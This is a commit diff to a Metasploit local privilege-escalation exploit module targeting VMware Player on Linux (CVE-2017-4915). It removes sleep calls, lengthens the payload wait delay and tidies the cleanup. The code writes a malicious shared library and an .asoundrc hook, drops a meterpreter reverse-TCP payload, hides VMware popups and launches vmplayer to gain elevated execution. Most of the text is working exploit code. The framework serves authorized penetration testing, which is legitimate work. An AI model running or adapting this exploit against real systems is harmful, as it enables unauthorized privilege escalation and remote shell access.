Remove sleeps

Author: bcoles

modules/exploits/linux/local/vmware_alsa_config.rb

@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
@@ -27,6 +27,7 @@ def initialize(info = {})
           [ 'CVE', '2017-4915' ],
           [ 'EDB', '42045' ],
           [ 'BID', '98566' ],
+          [ 'URL', 'https://gist.github.com/bcoles/cd26a831473088afafefc93641e184a9' ],
           [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2017-0009.html' ],
           [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1142' ]
         ],
@@ -46,7 +47,7 @@ def initialize(info = {})
       'DefaultOptions' =>
         {
           'Payload'     => 'linux/x64/meterpreter_reverse_tcp',
-          'WfsDelay'    => 15,
+          'WfsDelay'    => 30,
           'PrependFork' => true
         },
       'DefaultTarget'  => 1,
@@ -60,7 +61,6 @@ def initialize(info = {})
 
   def has_prereqs?
     vmplayer = cmd_exec 'which vmplayer'
-    Rex.sleep 0.5
     if vmplayer.include? 'vmplayer'
       vprint_good 'vmplayer is installed'
     else
@@ -69,7 +69,6 @@ def has_prereqs?
     end
 
     gcc = cmd_exec 'which gcc'
-    Rex.sleep 0.5
     if gcc.include? 'gcc'
       vprint_good 'gcc is installed'
     else
@@ -88,7 +87,6 @@ def check
 
     begin
       config = read_file '/etc/vmware/config'
-      Rex.sleep 0.5
     rescue
       config = ''
     end
@@ -117,16 +115,15 @@ def exploit
     end
 
     @home_dir = cmd_exec 'echo ${HOME}'
-    Rex.sleep 0.5
     unless @home_dir
       print_error "Could not find user's home directory"
       return
     end
+    @prefs_file = "#{@home_dir}/.vmware/preferences"
 
-    fname = rand_text_alphanumeric rand(10) + 5
-    @base_dir = "#{datastore['WritableDir']}/.#{fname}"
+    fname = ".#{rand_text_alphanumeric rand(10) + 5}"
+    @base_dir = "#{datastore['WritableDir']}/#{fname}"
     cmd_exec "mkdir #{@base_dir}"
-    Rex.sleep 0.5
 
     so = %Q^
 /*
@@ -159,11 +156,9 @@ def exploit
 ^
     vprint_status "Writing #{@base_dir}/#{fname}.c"
     write_file "#{@base_dir}/#{fname}.c", so
-    Rex.sleep 0.5
 
     vprint_status "Compiling #{@base_dir}/#{fname}.o"
     output = cmd_exec "gcc -fPIC -shared -o #{@base_dir}/#{fname}.so #{@base_dir}/#{fname}.c -Wall -ldl -std=gnu99"
-    Rex.sleep 0.5
     unless output == ''
       print_error "Compilation failed: #{output}"
       return
@@ -195,71 +190,66 @@ def exploit
 |
     vprint_status "Writing #{@base_dir}/#{fname}.vmx"
     write_file "#{@base_dir}/#{fname}.vmx", vmx
-    Rex.sleep 0.5
 
     vprint_status "Writing #{@base_dir}/#{fname}.elf"
     write_file "#{@base_dir}/#{fname}.elf", generate_payload_exe
-    Rex.sleep 0.5
 
     vprint_status "Setting #{@base_dir}/#{fname}.elf executable"
     cmd_exec "chmod +x #{@base_dir}/#{fname}.elf"
-    Rex.sleep 0.5
 
     asoundrc = %Q|
 hook_func.pulse_load_if_running {
-        lib "#{@base_dir}/#{fname}.so"
-        func "conf_pulse_hook_load_if_running"
+  lib "#{@base_dir}/#{fname}.so"
+  func "conf_pulse_hook_load_if_running"
 }
 |
     vprint_status "Writing #{@home_dir}/.asoundrc"
     write_file "#{@home_dir}/.asoundrc", asoundrc
-    Rex.sleep 0.5
 
     vprint_status 'Disabling VMware hint popups'
     unless directory? "#{@home_dir}/.vmware"
       cmd_exec "mkdir #{@home_dir}/.vmware"
-      Rex.sleep 0.5
-      @remove_prefs = true
+      @remove_prefs_dir = true
     end
 
-    if file? "#{@home_dir}/.vmware/preferences"
+    if file? @prefs_file
       begin
-        prefs = read_file "#{@home_dir}/.vmware/preferences"
-        Rex.sleep 0.5
+        prefs = read_file @prefs_file
       rescue
         prefs = ''
       end
     end
 
-    if prefs.nil? || prefs == ''
+    if prefs.blank?
       prefs = ".encoding = \"UTF8\"\n"
       prefs << "pref.vmplayer.firstRunDismissedVersion = \"999\"\n"
       prefs << "hints.hideAll = \"TRUE\"\n"
+      @remove_prefs_file = true
     elsif prefs =~ /hints\.hideAll/i
       prefs.gsub!(/hints\.hideAll.*$/i, 'hints.hideAll = "TRUE"')
     else
       prefs.sub!(/\n?\z/, "\nhints.hideAll = \"TRUE\"\n")
     end
-    vprint_status "Writing #{@home_dir}/.vmware/preferences"
-    write_file "#{@home_dir}/.vmware/preferences", prefs
-    Rex.sleep 0.5
+    vprint_status "Writing #{@prefs_file}"
+    write_file "#{@prefs_file}", prefs
 
     print_status 'Launching VMware Player...'
     cmd_exec "vmplayer #{@base_dir}/#{fname}.vmx"
-    Rex.sleep 0.5
   end
 
   def cleanup
-    print_status "Removing #{@base_dir}"
-    cmd_exec "rm #{@base_dir} -rf"
-    Rex.sleep 0.5
+    print_status "Removing #{@base_dir} directory"
+    cmd_exec "rm '#{@base_dir}' -rf"
+
     print_status "Removing #{@home_dir}/.asoundrc"
-    cmd_exec "rm #{@home_dir}/.asoundrc"
-    Rex.sleep 0.5
-    if @remove_prefs
-      print_status "Removing #{@home_dir}/.vmware"
-      cmd_exec "rm #{@home_dir}/.vmware -rf"
-      Rex.sleep 0.5
+    cmd_exec "rm '#{@home_dir}/.asoundrc'"
+
+    if @remove_prefs_dir
+      print_status "Removing #{@home_dir}/.vmware directory"
+      cmd_exec "rm '#{@home_dir}/.vmware' -rf"
+    elsif @remove_prefs_file
+      print_status "Removing #{@prefs_file}"
+      cmd_exec "rm '#{@prefs_file}' -rf"
     end
   end